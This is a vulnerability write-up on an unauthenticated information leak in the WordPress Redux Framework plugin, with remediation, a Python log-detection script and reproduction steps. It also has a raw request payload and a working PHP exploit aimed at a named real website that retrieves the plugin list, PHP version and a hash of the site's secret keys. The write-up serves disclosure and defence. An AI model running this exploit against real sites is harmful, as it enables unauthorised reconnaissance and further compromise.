Description

The WordPress Redux Framework plugin (versions up to 4.2.11) is vulnerable to information disclosure due to improperly secured AJAX actions. These actions, defined in redux-core/class-redux-core.php, are accessible to unauthenticated users and are generated using predictable MD5 hashes of the site URL with known salt values (-redux and -support).

An attacker can exploit this vulnerability to retrieve:

  • A list of active plugins and their versions
  • The site's PHP version
  • An unsalted MD5 hash of the site's AUTH_KEY concatenated with SECURE_AUTH_KEY

This vulnerability could assist attackers in reconnaissance or further exploitation of the affected WordPress site.

Impact

An attacker can exploit this vulnerability to gain sensitive information from the target system, which may lead to further exploitation.

Remediation

Update WordPress Redux Framework to version 4.2.12 or later to mitigate this vulnerability.

Steps to Reproduce

  1. Identify a WordPress website using the Redux Framework plugin (version <= 4.2.11).
  2. Compute the MD5 hash of the target site's URL with `/-redux` appended (the form used in the payload below).
  3. Send a request to /wp-admin/admin-ajax.php?action={MD5_HASH}.
  4. If successful, the response will contain sensitive information such as installed plugins, PHP version, and authentication keys.
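Detection example added here (not code from the original writeup or from the Redux project): because the action name is a deterministic hash of the site URL, a site owner can precompute it and match it against admin-ajax.php requests in the access log. The site URL, log lines and client IPs below are constructed assumptions.

```python
import hashlib
import re
from urllib.parse import parse_qs, urlsplit

# Combined access-log prefix: client IP, request line and status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def redux_action_hashes(site_url, first_response=None):
    """Map each predictable AJAX action name to the string it is the md5 of.
    The first action is md5(site_url + '/-redux'); both http and https forms are
    computed because the payload section uses http://HOST and the exploit uses https.
    The second action is md5(first_response + '-support'), so it is only predictable
    once the body returned by the first action has been captured."""
    host = urlsplit(site_url.rstrip("/")).netloc
    sources = [f"{scheme}://{host}/-redux" for scheme in ("http", "https")]
    if first_response is not None:
        sources.append(first_response + "-support")
    return {hashlib.md5(s.encode()).hexdigest(): s for s in sources}


def find_redux_probes(site_url, log_text, first_response=None):
    """Return (client_ip, action, hashed_string, status) for every log line that
    calls admin-ajax.php with one of the predictable Redux action names."""
    expected = redux_action_hashes(site_url, first_response)
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("path"))
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        for action in parse_qs(url.query).get("action", []):
            if action in expected:
                hits.append((m.group("ip"), action, expected[action], int(m.group("status"))))
    return hits


def sample_log(site_url):
    """Constructed access-log lines (not real traffic): a benign heartbeat call, a
    probe of this site's predictable -redux action, and an unrelated AJAX call."""
    probe = next(h for h, s in redux_action_hashes(site_url).items() if s.startswith("https"))
    return "\n".join([
        '203.0.113.10 - - [10/May/2025:12:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 512',
        f'203.0.113.10 - - [10/May/2025:12:00:02 +0000] "GET /wp-admin/admin-ajax.php?action={probe} HTTP/1.1" 200 2048',
        '198.51.100.7 - - [10/May/2025:12:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=nopriv_other HTTP/1.1" 400 77',
    ])
```

Running `find_redux_probes("https://example.com", sample_log("https://example.com"))` flags only the second line; a 200 response on an unpatched site confirms the information was served.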

Payloads

  GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1
  Host: target.com
  Accept: */*

Exploit Code

  <?php
  // Target site; the first action name is the MD5 of the site URL with "/-redux" appended.
  $target = "https://groww.in";
  $key1 = md5("$target/-redux");
  // Call the first unauthenticated AJAX action; its response body feeds the second hash.
  $key2 = file_get_contents("$target/wp-admin/admin-ajax.php?action=$key1");
  // Second action name: MD5 of the first response with "-support" appended.
  $key3 = md5($key2.'-support');
  // The support action also expects a code issued by Redux's verification endpoint.
  $redux_code = file_get_contents("http://verify.redux.io/?hash=$key3&site=$target/");
  // Call the support action and print whatever it returns.
  echo file_get_contents("$target/wp-admin/admin-ajax.php?action=$key3&code=$redux_code");
  ?>

POC Video

Thanks for reading! If you found this useful, feel free to share it with your fellow hunters. Happy hacking!